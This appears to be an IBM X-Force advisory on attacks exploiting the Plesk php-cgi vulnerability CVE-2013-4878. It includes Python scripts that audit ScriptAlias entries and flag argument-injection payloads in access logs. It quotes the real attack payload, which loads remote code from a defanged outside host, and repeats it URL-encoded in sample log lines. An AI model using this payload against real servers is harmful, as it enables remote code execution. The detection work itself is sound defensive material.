Background on Six Month Old Vulnerability Exploit Attempt
The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:
Critical Plesk Vulnerability
Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:
ScriptAlias /phppath/ "/usr/bin/"
Plesk administrators should contact their distribution channels for more information regarding configuration best practices.
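The following Python script is an added example, not IBM's or Plesk's own tooling, of how an administrator can audit Apache-style configuration for the ScriptAlias entry the assessment warns about. It flags any ScriptAlias or ScriptAliasMatch whose filesystem target is a system binary directory (/usr/bin as named above, plus an assumed list of similar directories), skips commented-out lines, and normalises paths so that a target such as /usr/lib/../bin/ is still recognised. The sample configuration and the candidate file locations are constructed for the demonstration and should be adjusted to the real server.

```python
import glob
import os
import re
from pathlib import Path

# Matches an Apache "ScriptAlias" or "ScriptAliasMatch" directive at the start of a line
# (a commented-out line beginning with '#' does not match): URL path, then filesystem
# path, the latter optionally double-quoted.
SCRIPTALIAS_RE = re.compile(
    r'^[ \t]*ScriptAlias(?:Match)?[ \t]+(\S+)[ \t]+"?([^"\s]+)"?',
    re.IGNORECASE | re.MULTILINE,
)

# Directories that must never be mapped as a CGI directory. /usr/bin is the one the
# assessment names; the others are an assumed, sensible extension for an audit.
SYSTEM_BIN_DIRS = ("/usr/bin", "/bin", "/usr/sbin", "/sbin", "/usr/local/bin")


def find_exposed_scriptaliases(config_text):
    """Return (url_path, fs_path) pairs whose target is a system binary directory."""
    findings = []
    for match in SCRIPTALIAS_RE.finditer(config_text):
        url_path, fs_path = match.group(1), match.group(2)
        # Normalise so that '/usr/lib/../bin/' is recognised as '/usr/bin'.
        target = os.path.normpath(fs_path)
        if any(target == d or target.startswith(d + "/") for d in SYSTEM_BIN_DIRS):
            findings.append((url_path, fs_path))
    return findings


def audit_config_files(paths):
    """Scan each readable file in `paths`; return {path: findings} for files with hits."""
    results = {}
    for path in paths:
        try:
            text = Path(path).read_text(errors="replace")
        except OSError:
            continue  # missing or unreadable: skip it and keep auditing the rest
        hits = find_exposed_scriptaliases(text)
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample configuration for the demonstration; not taken from a real server.
SAMPLE_CONFIG = """\
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
# ScriptAlias /phppath/ "/usr/bin/"        <- commented out, harmless
ScriptAlias /phppath/ "/usr/bin/"
ScriptAliasMatch ^/tools/(.*) /usr/local/bin/$1
"""

if __name__ == "__main__":
    print("sample config findings:", find_exposed_scriptaliases(SAMPLE_CONFIG))
    # Assumed locations of Apache / Plesk-managed vhost configuration; adjust as needed.
    candidates = glob.glob("/etc/httpd/conf.d/*.conf") + glob.glob("/etc/apache2/**/*.conf", recursive=True)
    for conf, hits in audit_config_files(candidates).items():
        for url_path, fs_path in hits:
            print(f"EXPOSED: {conf}: ScriptAlias {url_path} -> {fs_path}")
```

Run it as root on the web server so that every included configuration file is readable; a finding for /phppath/ mapped to /usr/bin/ is the exact condition the assessment says must not be present.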
Event
During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:
-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
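The payload above is a set of php.ini overrides passed to the php-cgi binary as command-line switches through the query string: allow_url_include and auto_prepend_file together cause the interpreter to fetch and execute the remote file before any script runs, while safe_mode, open_basedir and suhosin.simulation are switched off. As an added example, not part of the X-Force report, the Python below scans web server access-log lines for this pattern, decodes the switches, lists the dangerous directives, extracts the remote include location as an indicator to block, and counts hits per source address. The log format (Apache "combined") and the sample lines are assumptions constructed for the demonstration, using the payload and the source IP the report gives.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined"-style access log line: client address, identity, user, [timestamp],
# "METHOD target PROTOCOL", status, ... Only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# php.ini directives whose presence in an injected "-d" switch indicates an attempt to
# weaken the interpreter before loading remote code. The list is an assumption derived
# from the payload above, not a vendor-supplied signature.
SUSPICIOUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file", "safe_mode",
    "open_basedir", "suhosin.simulation", "cgi.force_redirect", "disable_functions",
}


def parse_php_cgi_switches(query):
    """Decode a raw query string and return ({directive: value}, [bare flags]) from
    '-d name=value' / '-dname=value' pairs and single flags such as '-n'."""
    tokens = unquote_plus(query).split()  # '+' and %XX become spaces and characters
    directives, flags = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-d" and i + 1 < len(tokens):
            name, _, value = tokens[i + 1].partition("=")
            directives[name] = value
            i += 2
        elif tok.startswith("-d") and len(tok) > 2:
            name, _, value = tok[2:].partition("=")
            directives[name] = value
            i += 1
        else:
            if tok.startswith("-"):
                flags.append(tok)
            i += 1
    return directives, flags


def detect_php_cgi_injection(line):
    """Return a finding dict for a request whose query string is a php-cgi argv-style
    payload, or None for a normal request or an unparsable line."""
    m = LOG_RE.match(line)
    if m is None or "?" not in m.group("target"):
        return None
    path, query = m.group("target").split("?", 1)
    # An ordinary 'key=value' query never begins with '-'; a switch payload always does.
    if not unquote_plus(query).lstrip().startswith("-"):
        return None
    directives, flags = parse_php_cgi_switches(query)
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": path,
        "directives": directives,
        "flags": flags,
        "suspicious": sorted(n for n in directives if n in SUSPICIOUS_DIRECTIVES),
        # The prepend target is where the remote code is fetched from: the IoC to block.
        "remote_include": directives.get("auto_prepend_file"),
    }


def scan_log(lines):
    """Run the detector over log lines; return (findings, hit count per source IP)."""
    findings = [f for f in map(detect_php_cgi_injection, lines) if f]
    return findings, Counter(f["ip"] for f in findings)


# The report's payload, URL-encoded as it would appear in a raw access log.
PAYLOAD = ("%2Dd+allow_url_include%3Don+%2Dd+safe_mode%3Doff+%2Dd+suhosin.simulation%3Don"
           "+%2Dd+max_execution_time%3D0+%2Dd+open_basedir%3Dnone"
           "+%2Dd+auto_prepend_file%3DhXXp%3A%2F%2Fisp.vc%2Fpackets.txt"
           "+%2Dd+cgi.force_redirect%3D0+%2Dd+cgi.redirect_status_env%3D0+%2Dn")

# Constructed sample log lines (timestamps, paths, status codes and the benign client
# addresses are invented for the demonstration).
SAMPLE_LOG = [
    f'80.82.78.9 - - [04/Jan/2014:02:41:17 +0000] "POST /phppath/php?{PAYLOAD} HTTP/1.1" 404 219 "-" "-"',
    f'80.82.78.9 - - [04/Jan/2014:02:41:18 +0000] "POST /cgi-bin/php?{PAYLOAD} HTTP/1.1" 404 219 "-" "-"',
    '198.51.100.23 - - [04/Jan/2014:02:42:05 +0000] "GET /index.php?page=home&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    "this line is not a valid access-log record",
]

if __name__ == "__main__":
    findings, by_ip = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f'{f["time"]} {f["ip"]} {f["path"]} suspicious={f["suspicious"]} include={f["remote_include"]}')
    print("hits per source:", dict(by_ip))
```

Feeding a whole log through scan_log gives the per-source tally that let the SOC conclude a single address was behind the activity; the remote_include value is the item to add to URL block lists and to search proxy logs for.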
Actions Taken
The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.
Data Seen
The top ten signatures seen in connection with this attack were:
| Count   | Signature |
|---------|-----------|
| 206,235 | TCP_Service_Sweep |
| 10,394  | HTTP: Detect PHP-CGI Remote code Execution vulnerability |
| 3,477   | PHP Remote Code Execution |
| 2,212   | TCP_Probe_Other |
| 1,803   | ICMP_Flood |
| 820     | SERVER-WEBAPP PHP-CGI remote file include attempt |
| 453     | PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability (34804) |
| 450     | SYNFlood |
| 227     | TCP SYN Host Sweep |
| 177     | PHP CGI Query String Parameter Handling Code Injection Vulnerability (34790) |
This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.
Summary and Recommendations
Attacks such as this one only reinforce the XFTAS recommendation to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement; sometimes, as in this case, it may be months before a vulnerability is exploited.
Further References
Cyber Threat and Intelligence Analyst, IBM X-Force